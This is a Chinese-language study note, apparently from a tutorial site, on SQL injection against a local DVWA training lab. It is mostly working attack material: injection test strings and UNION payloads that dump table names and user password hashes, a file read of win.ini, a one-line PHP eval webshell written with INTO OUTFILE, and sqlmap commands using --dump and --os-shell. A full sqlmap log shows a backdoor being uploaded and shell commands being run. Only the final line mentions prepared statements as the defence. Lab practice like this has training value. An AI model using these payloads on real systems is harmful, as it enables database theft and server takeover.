当前位置：Gxlcms > 数据库问题 > sql回显注入-笔记

sql回显注入-笔记

时间：2021-07-01 10:21:17 帮助过：55人阅读

拼接sql命令查询数据 注释常用于sql注入 # 井号单行注释注意：URL编码 %23 -- 两个减号加空格单行注释 /* */ 注释一个区域注意！在sql注入遇到单引号被转译的情况可以使用 HEX编码绕过单引号的使用注入测试poc 1 or 1=1 1‘ or ‘1=1 1" or "1=1 sql注入用法 查看表单字段数（列数）使用二分法 order by 列数排序 确定回显点 XXX‘ union select 1,2; http://192.168.3.88/dvwa/vulnerabilities/sqli/ ?id=xx‘+union+select+1,2--+ &Submit=Submit# 查看数据库版本存放目录 http://192.168.3.88/dvwa/vulnerabilities/sqli/ ?id=xx‘+union+select+@@version,@@datadir-- + &Submit=Submit# 查询数据库用户名和数据库名 select user(),database(); python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" --current-user --current-db 查看表名 select table_name from information_schema.tables where table_schema=‘dvwa‘; http://192.168.3.88/dvwa/vulnerabilities/sqli/ ?id=xx‘+union+select+1,table_name+from+information_schema.tables+where+table_schema=‘dvwa‘-- + &Submit=Submit# python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa --tables 查看列名 select column_name from information_schema.columns where table_name=‘users‘; http://192.168.3.88/dvwa/vulnerabilities/sqli/ ?id=xx‘+union+select+1,column_name from information_schema.columns where table_name=‘users‘-- + &Submit=Submit# python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users --columns 查询用户名密码 select user,password from users; http://192.168.3.88/dvwa/vulnerabilities/sqli/ ?id=xx‘+union+select user,password from users-- + &Submit=Submit# python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --dump 文件读取 select load_file(‘c:\\windows\\win.ini‘); 写入一句话webshell select "<?php @eval($_GET[‘cmd‘]);?>" into outfile ‘c:\\phpStudy\\WWW\\dvwa\\ttt.php‘; python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=low" -D dvwa -T users -C "user,password" --os-shell

___ __H__ ___ ___[‘]_____ ___ ___ {1.1.4.16#dev} |_ -| . [‘] | .‘| . | |___|_ [(]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:42:39 [09:42:39] [INFO] resuming back-end DBMS ‘mysql‘ [09:42:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: id=1‘ OR NOT 1977=1977#&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1‘ AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=Submit Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1‘ AND SLEEP(5)-- peqj&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1‘ UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit --- [09:42:39] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.4.45, Apache 2.4.23 back-end DBMS: MySQL >= 5.0 [09:42:39] [INFO] going to use a web backdoor for command prompt [09:42:39] [INFO] fingerprinting the back-end DBMS operating system [09:42:39] [INFO] the back-end DBMS operating system is Windows which web application language does the web server support? [1] ASP (default) [2] ASPX [3] JSP [4] PHP > 4 do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n [09:42:43] [WARNING] unable to automatically retrieve the web server document root what do you want to use for writable directory? [1] common location(s) (‘C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/‘) (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 2 please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA [09:42:51] [WARNING] unable to automatically parse any web server path [09:42:51] [INFO] trying to upload the file stager on ‘C:/phpStudy/WWW/DVWA/‘ via LIMIT ‘LINES TERMINATED BY‘ method [09:42:51] [INFO] heuristics detected web page charset ‘ascii‘ [09:42:51] [INFO] the file stager has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpummkl.php [09:42:52] [INFO] the backdoor has been successfully uploaded on ‘C:/phpStudy/WWW/DVWA/‘ - http://192.168.3.88:80/DVWA/tmpbhbmv.php [09:42:52] [INFO] calling OS shell. To quit type ‘x‘ or ‘q‘ and press ENTER os-shell> dir do you want to retrieve the command standard output? [Y/n/a] y [09:42:56] [INFO] heuristics detected web page charset ‘GB2312‘ command standard output: --- 驱动器 C 中的卷是 BOOTCAMP 卷的序列号是 D89B-813F C:\phpStudy\WWW\DVWA 的目录 2017-05-16 09:42 <DIR> . 2017-05-16 09:42 <DIR> .. 2015-10-05 15:51 500 .htaccess 2015-10-05 15:51 3,845 about.php 2015-10-05 15:51 7,229 CHANGELOG.md 2017-04-25 09:18 <DIR> config 2015-10-05 15:51 33,107 COPYING.txt 2017-04-25 09:18 <DIR> docs 2017-04-25 09:18 <DIR> dvwa 2017-04-25 09:18 <DIR> external 2015-10-05 15:51 1,406 favicon.ico 2017-04-25 09:18 <DIR> hackable 2015-10-05 15:51 895 ids_log.php 2015-10-05 15:51 4,389 index.php 2015-10-05 15:51 1,869 instructions.php 2015-10-05 15:51 3,522 login.php 2015-10-05 15:51 414 logout.php 2015-10-05 15:51 148 php.ini 2015-10-05 15:51 199 phpinfo.php 2015-10-05 15:51 7,651 README.md 2015-10-05 15:51 26 robots.txt 2015-10-05 15:51 4,686 security.php 2015-10-05 15:51 2,364 setup.php 2017-05-04 20:59 466 test.php 2017-05-16 09:42 908 tmpbhbmv.php 2017-05-16 09:42 727 tmpummkl.php 2017-05-15 21:11 29 ttt.php 2017-04-25 09:18 <DIR> vulnerabilities 20 个文件 74,380 字节 8 个目录 18,391,883,776 可用字节 --- os-shell> x [09:43:02] [INFO] cleaning up the web files uploaded [09:43:02] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times [09:43:02] [INFO] fetched data logged to text files under ‘C:\Users\zptxwd\.sqlmap\output\192.168.3.88‘ [*] shutting down at 09:43:03

sqlmap工具自动注入 low python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low" medium. 注意！在sql注入遇到单引号被转译的情况可以使用 HEX编码绕过单引号的使用 DVWA 正常业务逻辑：根据User ID在数据库内查找信息并回显至web页面技术分享

select firstname,surname from XXX where user_id=‘ LOW 使用1‘ or ‘1=1测试发现可行技术分享

python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=1r06imrpmtlhgg7magi3oos273;security=low" medium. 改包修改post参数 1 or 1=1 python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=688ktp48da80a4k0fi2ih64814;security=medium" -D dvwa -T users -C "user,password" --dump high 技术分享

可以发现查询位置与回显位置不一致 python sqlmap.py -u "http://192.168.3.88/dvwa/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=dv9h9urfu9bf9udkd7ih6qdbj3;security=high" --second-order "http://192.168.3.88/dvwa/vulnerabilities/sqli/session-input.php#" 防止sql注入：检测id数据类型，预编译绑定ID变量使用预编译、存储过程

sql回显注入-笔记

标签：cal injection schema trying tar upload aws database auto

sql回显注入-笔记

人气教程排行